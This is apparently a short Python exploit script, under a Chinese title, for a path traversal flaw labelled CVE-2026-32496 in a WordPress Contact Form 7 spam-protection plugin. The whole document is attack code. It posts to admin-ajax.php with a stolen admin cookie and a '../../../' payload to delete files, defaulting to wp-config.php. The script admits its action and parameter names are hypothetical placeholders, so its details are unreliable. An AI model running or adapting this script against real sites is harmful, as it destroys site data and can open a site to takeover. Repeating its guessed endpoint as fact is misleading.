CVE-2026-32496 Spam Protect路径遍历漏洞

import requests # Exploit Title: NYSL Spam Protect for Contact Form 7 - Path Traversal (CVE-2026-32496) # Date: 2026-03-25 # Exploit Author: Security Analyst # Vendor Homepage: https://wordpress.org/ # Software Link: https://wordpress.org/plugins/wp-contact-form-7-spam-blocker/ # Version: <= 1.2.9 # CVE: CVE-2026-32496 def exploit(target_url, admin_cookie, file_to_delete): """ Exploits the path traversal vulnerability to delete a file. Requires high privilege (Admin) cookie. """ # The vulnerable endpoint is typically an AJAX action or a specific admin page # Adjust the endpoint based on actual vulnerability analysis url = f"{target_url}/wp-admin/admin-ajax.php" headers = { "Cookie": admin_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } # Payload constructing path traversal sequence # The parameter name 'file' is hypothetical; replace with actual vulnerable param data = { "action": "vulnerable_plugin_action", "file": f"../../../{file_to_delete}" } try: response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print(f"[+] Request sent successfully to {url}") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with a valid authenticated admin cookie from the target site cookie = "wordpress_logged_in_xxxxxxxxxxxxxxxxxxxxxxxxxxxx" target_file = "wp-config.php" print(f"[*] Attempting to delete {target_file} on {target}...") exploit(target, cookie, target_file)